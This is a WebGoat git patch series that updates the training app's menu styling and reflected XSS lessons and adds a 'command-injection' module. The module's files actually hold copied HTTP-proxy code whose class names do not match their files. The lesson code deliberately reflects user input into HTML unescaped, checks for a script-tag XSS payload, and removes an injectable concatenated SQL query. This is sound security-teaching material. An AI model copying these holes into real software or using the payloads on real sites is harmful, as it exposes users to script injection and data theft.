From b4106919d06941cbf82638a8abe40c5eaaf9a6f9 Mon Sep 17 00:00:00 2001
From: Jason White <jason.white@owasp.org>
Date: Tue, 31 Jan 2017 14:47:35 -0500
Subject: [PATCH 04/10] cleaning up, fixing selected lesson class/es

---
 .../src/main/resources/static/css/main.css    | 27 ++++++++++++-------
 .../static/js/goatApp/view/MenuView.js        |  5 ++--
 2 files changed, 21 insertions(+), 11 deletions(-)

diff --git a/webgoat-container/src/main/resources/static/css/main.css b/webgoat-container/src/main/resources/static/css/main.css
index 526bcb2fc..d9e22453b 100644
--- a/webgoat-container/src/main/resources/static/css/main.css
+++ b/webgoat-container/src/main/resources/static/css/main.css
@@ -14,7 +14,7 @@ a:link,
 a:visited {
   text-decoration: none;
   outline: none;
-  color: #e84c3d;
+  /* color: #e84c3d; */
 }
 a:hover,
 a:active {
@@ -839,12 +839,6 @@ cookie-container {
   overflow-y:scroll auto;
   overflow-x:hidden;
 }
-
-#sidebar {
-  /*background-color:#333;*/
-  background-color:blue;
-}
-
   
 .sidebar-toggle {
   margin-left: -240px;
@@ -876,6 +870,7 @@ cookie-container {
   -ms-transition: all 200ms ease-in;
   transition: all 200ms ease-in;
 }
+
 #menu-container ul li a span {
   display: inline-block;
 }
@@ -897,6 +892,15 @@ cookie-container {
   margin-left:8px;
 }
 
+#menu-container ul ul li.selected a {
+    color:#e84c3d
+}
+
+#menu-container ul ul li.selected a:hover {
+    color:#ddd
+}
+
+
 #menu-container ul li a i {
   width: 20px;
 }
@@ -914,9 +918,11 @@ cookie-container {
   display: block;
 }
 
+#menu-container ul li:hover,
 #menu-container ul li a:hover,
 #menu-container ul li.active > a {
-  color: #e84c3d;
+  background-color: #e84c3d;
+  color:#ddd;
 }
 
 #menu-container ul span.lesson-complete {
@@ -927,9 +933,11 @@ cookie-container {
     display:inline-block;
 }
 
+/*
 #menu-container ul li.selected, #menu-container li a.selected {
-    background-color: ##aaa;
+    background-color: #aaa;
 }
+*/
 
 #menu-container ul li.stage {
   padding-left:3px;
@@ -937,6 +945,7 @@ cookie-container {
 
 #menu-container li.selected, #menu-container a.selected {
   color:#fff;
+  /* background-color:#000; */
   font-weight:550;
 }
 
diff --git a/webgoat-container/src/main/resources/static/js/goatApp/view/MenuView.js b/webgoat-container/src/main/resources/static/js/goatApp/view/MenuView.js
index 3dd2322e9..d71bf8c3e 100644
--- a/webgoat-container/src/main/resources/static/js/goatApp/view/MenuView.js
+++ b/webgoat-container/src/main/resources/static/js/goatApp/view/MenuView.js
@@ -108,14 +108,15 @@ define(['jquery',
 		},
 
 		onLessonClick: function (elementId) {
-			$('#'+this.curLessonLinkId).removeClass('selected');
+			$('#'+this.curLessonLinkId).removeClass('selected').parent().removeClass('selected');
 			//update
-			$('#'+elementId).addClass('selected');
+			$('#'+elementId).addClass('selected').parent().addClass('selected');
 			this.curLessonLinkId = elementId;
 		},
 
 		expandCategory: function (id) {
 			if (id) {
+			    //this.selectedCategory = id;
 				this.accordionMenu(id);
 			}
 		},

From af8f8c27a6570523280e5e77a2d88c5b43e96fac Mon Sep 17 00:00:00 2001
From: Jason White <jason.white@owasp.org>
Date: Thu, 16 Feb 2017 14:56:08 -0500
Subject: [PATCH 05/10] moving controls to top of content

---
 .../js/goatApp/view/LessonContentView.js      |  2 +-
 .../main/resources/templates/main_new.html    | 31 ++++++++++++-------
 2 files changed, 21 insertions(+), 12 deletions(-)

diff --git a/webgoat-container/src/main/resources/static/js/goatApp/view/LessonContentView.js b/webgoat-container/src/main/resources/static/js/goatApp/view/LessonContentView.js
index 84915c81f..07e9eb177 100644
--- a/webgoat-container/src/main/resources/static/js/goatApp/view/LessonContentView.js
+++ b/webgoat-container/src/main/resources/static/js/goatApp/view/LessonContentView.js
@@ -174,7 +174,7 @@ define(['jquery',
                 pagingControlsDiv = $('<div>',{class:'panel-body', id:'lesson-page-controls'});
                 pagingControlsDiv.append(prevPageButton);
                 pagingControlsDiv.append(nextPageButton);
-                this.$el.append(pagingControlsDiv);
+                this.$el.find('.lesson-page-controls').append(pagingControlsDiv);
             }
 
         },
diff --git a/webgoat-container/src/main/resources/templates/main_new.html b/webgoat-container/src/main/resources/templates/main_new.html
index 7553ef8b2..a791f2026 100644
--- a/webgoat-container/src/main/resources/templates/main_new.html
+++ b/webgoat-container/src/main/resources/templates/main_new.html
@@ -62,7 +62,8 @@
                     <i class="fa fa-user"></i> <span class="caret"></span>
                 </button>
                 <ul class="dropdown-menu dropdown-menu-left">
-                    <li role="presentation"><a role="menuitem" tabindex="-1" th:href="@{/login(logout)}" th:text="#{logout}">Logout</a></li>
+                    <li role="presentation"><a role="menuitem" tabindex="-1" th:href="@{/login(logout)}"
+                                               th:text="#{logout}">Logout</a></li>
                     <li role="presentation" class="divider"></li>
                     <li role="presentation" class="disabled"><a role="menuitem" tabindex="-1" href="#">User: <span
                             th:text="${#authentication.name}"></span></a>
@@ -73,25 +74,27 @@
                     </a>
                     </li>
                     <li role="presentation" class="divider"></li>
-                    <li role="presentation" class="disabled"><a role="menuitem" tabindex="-1" href="#" th:text="#{version}">Version: <span
+                    <li role="presentation" class="disabled"><a role="menuitem" tabindex="-1" href="#"
+                                                                th:text="#{version}">Version: <span
                             th:text="${@environment.getProperty('webgoat.build.version')}"></span></a>
                     </li>
-                    <li role="presentation" class="disabled"><a role="menuitem" tabindex="-1" href="#" th:text="#{build}">Build:
+                    <li role="presentation" class="disabled"><a role="menuitem" tabindex="-1" href="#"
+                                                                th:text="#{build}">Build:
                         <span th:text="${@environment.getProperty('webgoat.build.number')}"></span></a></li>
 
                 </ul>
             </div>
             <div style="display:inline" id="settings">
                 <!--<button type="button" id="admin-button" class="btn btn-default right_nav_button" title="Administrator">-->
-                    <!--<i class="fa fa-cog"></i>-->
+                <!--<i class="fa fa-cog"></i>-->
                 <!--</button>-->
                 <button type="button" id="report-card-button" class="btn btn-default right_nav_button button-up"
                         th:title="#{report.card}">
                     <a href="#reportCard"><i class="fa fa-bar-chart-o"></i></a>
                 </button>
                 <!--<button type="button" id="user-management" class="btn btn-default right_nav_button"-->
-                        <!--title="User management">-->
-                    <!--<i class="fa fa-users"></i>-->
+                <!--title="User management">-->
+                <!--<i class="fa fa-users"></i>-->
                 <!--</button>-->
             </div>
             <button type="button" id="about-button" class="btn btn-default right_nav_button" th:title="#{about}"
@@ -99,7 +102,8 @@
                 <i class="fa fa-info"></i>
             </button>
             <a href="mailto:${contactEmail}?Subject=Webgoat%20feedback" target="_top">
-                <button type="button" class="btn btn-default right_nav_button" data-toggle="tooltip" th:title="#{contact}">
+                <button type="button" class="btn btn-default right_nav_button" data-toggle="tooltip"
+                        th:title="#{contact}">
                     <i class="fa fa-envelope"></i>
                 </button>
             </a>
@@ -140,9 +144,11 @@
                                             id="show-hints-button" th:text="#{show.hints}">Show hints
                                     </button>
                                     <button class="btn btn-primary btn-xs btn-danger help-button"
-                                            id="show-lesson-overview-button" th:text="#{lesson.overview}">Lesson overview
+                                            id="show-lesson-overview-button" th:text="#{lesson.overview}">Lesson
+                                        overview
                                     </button>
-                                    <button class="btn btn-xs help-button" id="restart-lesson-button" th:text="#{reset.lesson}">Reset Lesson
+                                    <button class="btn btn-xs help-button" id="restart-lesson-button"
+                                            th:text="#{reset.lesson}">Reset Lesson
                                     </button>
                                 </div>
 
@@ -151,8 +157,8 @@
                                     <div class="panel">
                                         <div id="message" class="info" th:utext="${message}"></div>
                                         <div class="panel-body" id="lesson-hint">
-                            <span class="glyphicon-class glyphicon glyphicon-circle-arrow-left"
-                                  id="show-prev-hint"></span>
+                                            <span class="glyphicon-class glyphicon glyphicon-circle-arrow-left"
+                                                  id="show-prev-hint"></span>
                                             <span class="glyphicon-class glyphicon glyphicon-circle-arrow-right"
                                                   id="show-next-hint"></span>
                                             <br/>
@@ -166,6 +172,9 @@
                                         <div class="panel-body" id="lesson-overview"></div>
                                     </div>
                                 </div>
+                                <div class="lesson-page-controls">
+
+                                </div>
 
                                 <div class="lesson-content">
 

From 7f532f0ffc2c2a3631a7ca964380d2779ccd46ee Mon Sep 17 00:00:00 2001
From: Jason White <jason.white@owasp.org>
Date: Fri, 17 Feb 2017 13:05:54 -0500
Subject: [PATCH 06/10] XSS lesson updates

---
 .../webgoat/session/UserSessionData.java      |   4 +
 .../static/js/goatApp/view/GoatRouter.js      |   7 +-
 .../js/goatApp/view/LessonContentView.js      |   4 +-
 webgoat-lessons/command-injection/pom.xml     |  34 ++++
 .../webgoat/plugin/CommandInjection.java      |  63 ++++++
 .../plugin/CommandInjectionExecute.java       |  58 ++++++
 .../html/CommandInjection.html                |  51 +++++
 .../lessonPlans/en/CommandInjection1.adoc     |  20 ++
 .../plugin/i18n/WebGoatLabels.properties      |   4 +
 .../plugin/CrossSiteScriptingLesson5a.java    |  33 ++-
 .../plugin/CrossSiteScriptingLesson5b.java    | 192 +++---------------
 .../plugin/CrossSiteScriptingLesson6a.java    | 185 ++---------------
 .../plugin/CrossSiteScriptingLesson6b.java    |  95 ---------
 .../webgoat/plugin/DOMCrossSiteScripting.java |   8 +-
 .../html/CrossSiteScripting.html              |  37 ++--
 .../en/CrossSiteScripting_content1.adoc       |  20 +-
 .../en/CrossSiteScripting_content3.adoc       |   2 +-
 .../en/CrossSiteScripting_content4.adoc       |   7 +-
 .../en/CrossSiteScripting_content5a.adoc      |   4 +-
 .../en/CrossSiteScripting_content5b.adoc      |   3 +-
 .../en/CrossSiteScripting_content5c.adoc      |   9 +
 .../en/CrossSiteScripting_content6.adoc       |  12 +-
 .../en/CrossSiteScripting_content6a.adoc      |  11 +-
 .../plugin/i18n/WebGoatLabels.properties      |  18 +-
 24 files changed, 402 insertions(+), 479 deletions(-)
 create mode 100644 webgoat-lessons/command-injection/pom.xml
 create mode 100644 webgoat-lessons/command-injection/src/main/java/org/owasp/webgoat/plugin/CommandInjection.java
 create mode 100644 webgoat-lessons/command-injection/src/main/java/org/owasp/webgoat/plugin/CommandInjectionExecute.java
 create mode 100644 webgoat-lessons/command-injection/src/main/resources/plugin/CommandInjection/html/CommandInjection.html
 create mode 100644 webgoat-lessons/command-injection/src/main/resources/plugin/CommandInjection/lessonPlans/en/CommandInjection1.adoc
 create mode 100644 webgoat-lessons/command-injection/src/main/resources/plugin/i18n/WebGoatLabels.properties
 delete mode 100644 webgoat-lessons/cross-site-scripting/src/main/java/org/owasp/webgoat/plugin/CrossSiteScriptingLesson6b.java
 create mode 100644 webgoat-lessons/cross-site-scripting/src/main/resources/plugin/CrossSiteScripting/lessonPlans/en/CrossSiteScripting_content5c.adoc

diff --git a/webgoat-container/src/main/java/org/owasp/webgoat/session/UserSessionData.java b/webgoat-container/src/main/java/org/owasp/webgoat/session/UserSessionData.java
index e5546c2ba..1e1229e40 100644
--- a/webgoat-container/src/main/java/org/owasp/webgoat/session/UserSessionData.java
+++ b/webgoat-container/src/main/java/org/owasp/webgoat/session/UserSessionData.java
@@ -18,6 +18,10 @@ public class UserSessionData {
 
     //GETTERS & SETTERS
     public Object getValue(String key) {
+        if (!userSessionData.containsKey(key)) {
+            return null;
+        }
+        // else
         return userSessionData.get(key);
     }
 
diff --git a/webgoat-container/src/main/resources/static/js/goatApp/view/GoatRouter.js b/webgoat-container/src/main/resources/static/js/goatApp/view/GoatRouter.js
index dd278c7cc..ec1667826 100644
--- a/webgoat-container/src/main/resources/static/js/goatApp/view/GoatRouter.js
+++ b/webgoat-container/src/main/resources/static/js/goatApp/view/GoatRouter.js
@@ -54,7 +54,7 @@ define(['jquery',
             webgoat.customjs.jquery = $; //passing jquery into custom js scope ... still klunky, but works for now
             webgoat.customjs.jqueryVuln = $vuln;
 
-            // temporary shim to support dom-xss lesson
+            // temporary shim to support dom-xss assignment
             webgoat.customjs.phoneHome = function (e) {
                 console.log('phoneHome invoked');
                 console.log(arguments.callee);
@@ -97,6 +97,11 @@ define(['jquery',
             this.menuController.updateMenu(name);
         },
 
+        testRoute: function (param) {
+            this.lessonController.testHandler(param);
+            //this.menuController.updateMenu(name);
+        },
+
         welcomeRoute: function () {
             render();
             this.lessonController.loadWelcome();
diff --git a/webgoat-container/src/main/resources/static/js/goatApp/view/LessonContentView.js b/webgoat-container/src/main/resources/static/js/goatApp/view/LessonContentView.js
index 07e9eb177..7f478dab2 100644
--- a/webgoat-container/src/main/resources/static/js/goatApp/view/LessonContentView.js
+++ b/webgoat-container/src/main/resources/static/js/goatApp/view/LessonContentView.js
@@ -114,7 +114,9 @@ define(['jquery',
             this.renderFeedback(data.feedback);
 
             this.renderOutput(data.output || "");
-            if (data.assignmentCompleted) {
+            //TODO: refactor back assignmentCompleted in Java
+            if (data.lessonCompleted || data.assignmentCompleted) {
+
                 this.markAssignmentComplete();
                 this.trigger('assignment:complete');
             } else {
diff --git a/webgoat-lessons/command-injection/pom.xml b/webgoat-lessons/command-injection/pom.xml
new file mode 100644
index 000000000..313061c5d
--- /dev/null
+++ b/webgoat-lessons/command-injection/pom.xml
@@ -0,0 +1,34 @@
+<project xmlns="http://maven.apache.org/POM/4.0.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
+         xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/maven-v4_0_0.xsd">
+    <modelVersion>4.0.0</modelVersion>
+    <artifactId>http-proxies</artifactId>
+    <packaging>jar</packaging>
+    <parent>
+        <groupId>org.owasp.webgoat.lesson</groupId>
+        <artifactId>webgoat-lessons-parent</artifactId>
+        <version>8.0-SNAPSHOT</version>
+    </parent>
+
+    <dependencies>
+        <dependency>
+            <groupId>org.springframework.boot</groupId>
+            <artifactId>spring-boot-starter-test</artifactId>
+            <scope>test</scope>
+        </dependency>
+        <dependency>
+            <groupId>org.springframework.security</groupId>
+            <artifactId>spring-security-test</artifactId>
+            <version>4.1.3.RELEASE</version>
+            <scope>test</scope>
+        </dependency>
+        <dependency>
+            <groupId>junit</groupId>
+            <artifactId>junit</artifactId>
+            <version>${junit.version}</version>
+            <type>jar</type>
+            <scope>test</scope>
+        </dependency>
+
+    </dependencies>
+
+</project>
diff --git a/webgoat-lessons/command-injection/src/main/java/org/owasp/webgoat/plugin/CommandInjection.java b/webgoat-lessons/command-injection/src/main/java/org/owasp/webgoat/plugin/CommandInjection.java
new file mode 100644
index 000000000..ad87c7c20
--- /dev/null
+++ b/webgoat-lessons/command-injection/src/main/java/org/owasp/webgoat/plugin/CommandInjection.java
@@ -0,0 +1,63 @@
+package org.owasp.webgoat.plugin;
+
+import com.beust.jcommander.internal.Lists;
+import org.owasp.webgoat.lessons.Category;
+import org.owasp.webgoat.lessons.NewLesson;
+
+import java.util.List;
+
+/**
+ * ************************************************************************************************
+ * This file is part of WebGoat, an Open Web Application Security Project utility. For details,
+ * please see http://www.owasp.org/
+ * <p>
+ * Copyright (c) 2002 - 20014 Bruce Mayhew
+ * <p>
+ * This program is free software; you can redistribute it and/or modify it under the terms of the
+ * GNU General Public License as published by the Free Software Foundation; either version 2 of the
+ * License, or (at your option) any later version.
+ * <p>
+ * This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without
+ * even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
+ * General Public License for more details.
+ * <p>
+ * You should have received a copy of the GNU General Public License along with this program; if
+ * not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA
+ * 02111-1307, USA.
+ * <p>
+ * Getting Source ==============
+ * <p>
+ * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository for free software
+ * projects.
+ * <p>
+ *
+ * @author WebGoat
+ * @version $Id: $Id
+ * @since October 12, 2016
+ */
+public class HttpProxies extends NewLesson {
+    @Override
+    public Category getDefaultCategory() {
+        return Category.GENERAL;
+    }
+
+    @Override
+    public List<String> getHints() {
+        return Lists.newArrayList();
+    }
+
+    @Override
+    public Integer getDefaultRanking() {
+        return 2;
+    }
+
+    @Override
+    public String getTitle() {
+        return "http-proxies.title";
+    }
+
+    @Override
+    public String getId() {
+        return "HttpProxies";
+    }
+}
diff --git a/webgoat-lessons/command-injection/src/main/java/org/owasp/webgoat/plugin/CommandInjectionExecute.java b/webgoat-lessons/command-injection/src/main/java/org/owasp/webgoat/plugin/CommandInjectionExecute.java
new file mode 100644
index 000000000..ee8f9ef64
--- /dev/null
+++ b/webgoat-lessons/command-injection/src/main/java/org/owasp/webgoat/plugin/CommandInjectionExecute.java
@@ -0,0 +1,58 @@
+package org.owasp.webgoat.plugin;
+
+import org.owasp.webgoat.assignments.AssignmentEndpoint;
+import org.owasp.webgoat.assignments.AssignmentPath;
+import org.owasp.webgoat.assignments.AttackResult;
+import org.springframework.web.bind.annotation.RequestMapping;
+import org.springframework.web.bind.annotation.RequestMethod;
+import org.springframework.web.bind.annotation.ResponseBody;
+
+import javax.servlet.http.HttpServletRequest;
+import java.io.IOException;
+
+/**
+ * *************************************************************************************************
+ *
+ *
+ * This file is part of WebGoat, an Open Web Application Security Project
+ * utility. For details, please see http://www.owasp.org/
+ *
+ * Copyright (c) 2002 - 20014 Bruce Mayhew
+ *
+ * This program is free software; you can redistribute it and/or modify it under
+ * the terms of the GNU General Public License as published by the Free Software
+ * Foundation; either version 2 of the License, or (at your option) any later
+ * version.
+ *
+ * This program is distributed in the hope that it will be useful, but WITHOUT
+ * ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
+ * FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
+ * details.
+ *
+ * You should have received a copy of the GNU General Public License along with
+ * this program; if not, write to the Free Software Foundation, Inc., 59 Temple
+ * Place - Suite 330, Boston, MA 02111-1307, USA.
+ *
+ * Getting Source ==============
+ *
+ * Source for this application is maintained at https://github.com/WebGoat/WebGoat, a repository
+ * for free software projects.
+ *
+ * For details, please see http://webgoat.github.io
+ *
+ * @author Bruce Mayhew <a href="http://code.google.com/p/webgoat">WebGoat</a>
+ * @created October 28, 2003
+ */
+@AssignmentPath("/HttpProxies/intercept-request")
+public class HttpBasicsInterceptRequest extends AssignmentEndpoint {
+
+	@RequestMapping(method = RequestMethod.GET)
+	public @ResponseBody
+	AttackResult completed(HttpServletRequest request) throws IOException {
+		if (request.getHeader("x-request-intercepted").toLowerCase().equals("true") && request.getParameter("changeMe").equals("Requests are tampered easily")) {
+            return trackProgress(success().feedback("http-proxies.intercept.success").build());
+		} else {
+            return trackProgress(failed().feedback("http-proxies.intercept.failure").build());
+        }
+	}
+}
\ No newline at end of file
diff --git a/webgoat-lessons/command-injection/src/main/resources/plugin/CommandInjection/html/CommandInjection.html b/webgoat-lessons/command-injection/src/main/resources/plugin/CommandInjection/html/CommandInjection.html
new file mode 100644
index 000000000..59113e121
--- /dev/null
+++ b/webgoat-lessons/command-injection/src/main/resources/plugin/CommandInjection/html/CommandInjection.html
@@ -0,0 +1,51 @@
+<!DOCTYPE html>
+
+<html xmlns:th="http://www.thymeleaf.org">
+
+    <div class="lesson-page-wrapper">
+        <!-- reuse this lesson-page-wrapper block for each 'page' of content in your lesson -->
+        <!-- include content here. Content will be presented via asciidocs files,
+        which you put in src/main/resources/plugin/lessonplans/{lang}/{fileName}.adoc -->
+        <div class="adoc-content" th:replace="doc:HttpBasics_ProxyIntro0.adoc"></div>
+    </div>
+
+    <div class="lesson-page-wrapper">
+		<!-- reuse this lesson-page-wrapper block for each 'page' of content in your lesson -->
+		<!-- include content here. Content will be presented via asciidocs files,
+        which you put in src/main/resources/plugin/lessonplans/{lang}/{fileName}.adoc -->
+		<div class="adoc-content" th:replace="doc:HttpBasics_ProxyIntro1.adoc"></div>
+	</div>
+
+    <div class="lesson-page-wrapper">
+        <!-- reuse this lesson-page-wrapper block for each 'page' of content in your lesson -->
+        <!-- include content here. Content will be presented via asciidocs files,
+        which you put in src/main/resources/plugin/lessonplans/{lang}/{fileName}.adoc -->
+        <div class="adoc-content" th:replace="doc:HttpBasics_ProxyIntro2.adoc"></div>
+    </div>
+
+	<div class="lesson-page-wrapper">
+		<!-- reuse this lesson-page-wrapper block for each 'page' of content in your lesson -->
+		<!-- include content here. Content will be presented via asciidocs files,
+        which you put in src/main/resources/plugin/lessonplans/{lang}/{fileName}.adoc -->
+		<div class="adoc-content" th:replace="doc:HttpBasics_ProxyIntro3.adoc"></div>
+	</div>
+
+    <div class="lesson-page-wrapper">
+        <!-- stripped down without extra comments -->
+        <div class="adoc-content" th:replace="doc:HttpBasics_ProxyIntercept.adoc"></div>
+        <div class="attack-container">
+            <div class="assignment-success"><i class="fa fa-2 fa-check hidden" aria-hidden="true"></i></div>
+            <form class="attack-form" accept-charset="UNKNOWN" name="intercept-request"
+                  method="POST"
+                  action="/WebGoat/HttpBasics/intercept-request"
+                  enctype="application/json;charset=UTF-8">
+
+                <input type="text" value="doesn't matter really" name="changeMe" />
+                <input type="submit" value="Submit" />
+
+            </form>
+            <div class="attack-feedback"></div>
+            <div class="attack-output"></div>
+        </div>
+    </div>
+</html>
\ No newline at end of file
diff --git a/webgoat-lessons/command-injection/src/main/resources/plugin/CommandInjection/lessonPlans/en/CommandInjection1.adoc b/webgoat-lessons/command-injection/src/main/resources/plugin/CommandInjection/lessonPlans/en/CommandInjection1.adoc
new file mode 100644
index 000000000..6344750d7
--- /dev/null
+++ b/webgoat-lessons/command-injection/src/main/resources/plugin/CommandInjection/lessonPlans/en/CommandInjection1.adoc
@@ -0,0 +1,20 @@
+
+== HTTP Proxy Overview
+
+Many times proxies are used as a way of accessing otehrwise blocked content.  A user might connect to server A, which relays content from server B
+ ... Because Server B is blocked wihtin the user's network. That's not the use case we will be dealing with here, but the concept is the same.
+HTTP Proxies receive requesets from a client and relay them. They also typically record them. They act as a man-in-the-middle (keep that in mind if you decide to
+use a proxy server to connect to some other system that is otherwise blocked). We won't get into HTTP vs HTTPS just yet, but that's an important topic in
+relationship to proxies.
+
+=== Proxy Capabilities
+
+Proxies sit between your client and the server the client is talking to. You can record and analyze the requests & responses.  You can also use the proxy to
+modify (tamper) the requests and responses.  Proxies also have automated or semi-automated functions that allow  you to gain efficiency in testing and
+analyzing the security of a website.
+
+=== Other Uses for Proxies
+
+ZAP specifically can also be used in the development process in a CI/CD, DevOps or otherwise automated build/test environment.  This lesson does
+not currently have any details on that, but it is worth mentioning. There are a number of examples on the internet of it being integrated into a
+CI/CD with Jenkins, maven or other build processes.
\ No newline at end of file
diff --git a/webgoat-lessons/command-injection/src/main/resources/plugin/i18n/WebGoatLabels.properties b/webgoat-lessons/command-injection/src/main/resources/plugin/i18n/WebGoatLabels.properties
new file mode 100644
index 000000000..2140e3ed4
--- /dev/null
+++ b/webgoat-lessons/command-injection/src/main/resources/plugin/i18n/WebGoatLabels.properties
@@ -0,0 +1,4 @@
+http-proxies.title=HTTP Proxies
+
+http-proxies.intercept.success=Well done, you tampered the request as expected
+http-proxies.intercept.failure=Please try again. Make sure to make all the changes. And case sensitivity may matter ... or not, you never know!
\ No newline at end of file
diff --git a/webgoat-lessons/cross-site-scripting/src/main/java/org/owasp/webgoat/plugin/CrossSiteScriptingLesson5a.java b/webgoat-lessons/cross-site-scripting/src/main/java/org/owasp/webgoat/plugin/CrossSiteScriptingLesson5a.java
index 857939090..6b87d7475 100644
--- a/webgoat-lessons/cross-site-scripting/src/main/java/org/owasp/webgoat/plugin/CrossSiteScriptingLesson5a.java
+++ b/webgoat-lessons/cross-site-scripting/src/main/java/org/owasp/webgoat/plugin/CrossSiteScriptingLesson5a.java
@@ -4,6 +4,8 @@ package org.owasp.webgoat.plugin;
 import org.owasp.webgoat.assignments.AssignmentEndpoint;
 import org.owasp.webgoat.assignments.AssignmentPath;
 import org.owasp.webgoat.assignments.AttackResult;
+import org.owasp.webgoat.session.UserSessionData;
+import org.springframework.beans.factory.annotation.Autowired;
 import org.springframework.web.bind.annotation.RequestMapping;
 import org.springframework.web.bind.annotation.RequestMethod;
 import org.springframework.web.bind.annotation.RequestParam;
@@ -47,21 +49,44 @@ import java.io.IOException;
 @AssignmentPath("/CrossSiteScripting/attack5a")
 public class CrossSiteScriptingLesson5a extends AssignmentEndpoint {
 
-	@RequestMapping(method = RequestMethod.POST)
+    @Autowired
+    UserSessionData userSessionData;
+
+	@RequestMapping(method = RequestMethod.GET)
 	public @ResponseBody AttackResult completed(@RequestParam Integer QTY1,
 												@RequestParam Integer QTY2, @RequestParam Integer QTY3,
 												@RequestParam Integer QTY4, @RequestParam String field1,
 												@RequestParam Integer field2, HttpServletRequest request)
 			throws IOException {
-		System.out.println("foo");
+		// System.out.println("foo");
 		// Should add some QTY validation here.  Someone could have fun and enter a negative quantity and get merchanidise and a refund :)
 		double totalSale = QTY1.intValue() * 69.99 + QTY2.intValue() * 27.99 + QTY3.intValue() * 1599.99 + QTY4.intValue() * 299.99;  
-		
+
+        userSessionData.setValue("xss-reflected1-complete",(Object)"false");
        	StringBuffer cart = new StringBuffer();
        	cart.append("Thank you for shopping at WebGoat. <br />You're support is appreciated<hr />");
        	cart.append("<p>We have chaged credit card:" + field1 + "<br />");
        	cart.append(   "                             ------------------- <br />");
        	cart.append(   "                               $" + totalSale);
-        return trackProgress(failed().output(cart.toString()).build());
+
+       	//init state
+        if (userSessionData.getValue("xss-reflected1-complete") == null) {
+            userSessionData.setValue("xss-reflected1-complete",(Object)"false");
+        }
+
+        if (field1.toLowerCase().contains("<script>alert('my javascript here')</script>")) {
+			//return trackProgress()
+            userSessionData.setValue("xss-reflected-5a-complete","true");
+            return trackProgress(success()
+                    .feedback("xss-reflected-5a-success")
+                    .output(cart.toString())
+                    .build());
+		} else {
+            userSessionData.setValue("xss-reflected1-complete","false");
+            return trackProgress(success()
+                    .feedback("xss-reflected-5a-failure")
+                    .output(cart.toString())
+                    .build());
+        }
 	}
 }
\ No newline at end of file
diff --git a/webgoat-lessons/cross-site-scripting/src/main/java/org/owasp/webgoat/plugin/CrossSiteScriptingLesson5b.java b/webgoat-lessons/cross-site-scripting/src/main/java/org/owasp/webgoat/plugin/CrossSiteScriptingLesson5b.java
index d09d0daf2..eb609039f 100644
--- a/webgoat-lessons/cross-site-scripting/src/main/java/org/owasp/webgoat/plugin/CrossSiteScriptingLesson5b.java
+++ b/webgoat-lessons/cross-site-scripting/src/main/java/org/owasp/webgoat/plugin/CrossSiteScriptingLesson5b.java
@@ -4,7 +4,16 @@ package org.owasp.webgoat.plugin;
 
 import org.owasp.webgoat.assignments.AssignmentEndpoint;
 import org.owasp.webgoat.assignments.AssignmentPath;
+import org.owasp.webgoat.assignments.AttackResult;
+import org.owasp.webgoat.session.UserSessionData;
+import org.springframework.beans.factory.annotation.Autowired;
+import org.springframework.web.bind.annotation.RequestMapping;
+import org.springframework.web.bind.annotation.RequestMethod;
+import org.springframework.web.bind.annotation.RequestParam;
+import org.springframework.web.bind.annotation.ResponseBody;
 
+import javax.servlet.http.HttpServletRequest;
+import java.io.IOException;
 
 
 /***************************************************************************************************
@@ -39,176 +48,27 @@ import org.owasp.webgoat.assignments.AssignmentPath;
  */
 @AssignmentPath("/CrossSiteScripting/attack5b")
 public class CrossSiteScriptingLesson5b extends AssignmentEndpoint {
-/*
-	@RequestMapping(method = RequestMethod.POST)
-	public @ResponseBody AttackResult completed(@RequestParam String userid, HttpServletRequest request) throws IOException {
-		return injectableQuery(userid);
-	
-	}
 
-    protected AttackResult injectableQuery(String accountName)
-    {
-        try
-        {
-            Connection connection = DatabaseUtilities.getConnection(getWebSession());
-            String query = "SELECT * FROM user_data WHERE userid = " + accountName;
+    @Autowired
+    UserSessionData userSessionData;
 
-            try
-            {
-                Statement statement = connection.createStatement(ResultSet.TYPE_SCROLL_INSENSITIVE,
-                                                                    ResultSet.CONCUR_READ_ONLY);
-                ResultSet results = statement.executeQuery(query);
+    @RequestMapping(method = RequestMethod.POST)
+    public @ResponseBody
+    AttackResult completed(@RequestParam String isReflectedXSS)  throws IOException {
+    // init
+    System.out.println(userSessionData.getValue("xss-reflected5a-complete"));
 
-                if ((results != null) && (results.first() == true))
-                {
-                    ResultSetMetaData resultsMetaData = results.getMetaData();
-                	StringBuffer output = new StringBuffer();
+    //TODO
+//    if (null == userSessionData.getValue("xss-reflected5a-complete") || userSessionData.getValue("xss-reflected-5a-complete").equals("false")) {
+//        //userSessionData.setValue("xss-reflected1-complete",(Object)"false");
+//        return trackProgress(success().feedback("xss-reflected-5b-do5a-first").build());
+//    }
 
-                    output.append(writeTable(results, resultsMetaData));
-                    results.last();
-
-                    // If they get back more than one user they succeeded
-                    if (results.getRow() >= 6)
-                    {
-                    	return trackProgress(AttackResult.success("You have succeed: " + output.toString()));
-                   } else {
-                	   return trackProgress(AttackResult.failed("You are close, try again. " + output.toString()));
-                   }
-                    
-                }
-                else
-                {
-                	return trackProgress(AttackResult.failed("No Results Matched. Try Again. "));
-
-//                    output.append(getLabelManager().get("NoResultsMatched"));
-                }
-            } catch (SQLException sqle)
-            {
-            	
-            	return trackProgress(AttackResult.failed(sqle.getMessage()));
-            }
-        } catch (Exception e)
-        {
-        	e.printStackTrace();
-        	return trackProgress(AttackResult.failed( "ErrorGenerating" + this.getClass().getName() + " : " + e.getMessage()));
+    if (isReflectedXSS.toLowerCase().equals("no") || isReflectedXSS.toLowerCase().equals("n")) {
+            //return trackProgress()
+            return trackProgress(success().feedback("xss-reflected-5b-success").build());
+        } else {
+            return trackProgress(success().feedback("xss-reflected-5b-failure").build());
         }
     }
-    
-    public String writeTable(ResultSet results, ResultSetMetaData resultsMetaData) throws IOException,
-	SQLException 
-    {
-		int numColumns = resultsMetaData.getColumnCount();
-		results.beforeFirst();
-		StringBuffer t = new StringBuffer();
-		t.append("<p>");
-	
-		if (results.next())
-		{
-			for (int i = 1; i < (numColumns + 1); i++)
-			{
-				t.append(resultsMetaData.getColumnName(i));
-				t.append(", ");
-			}
-		
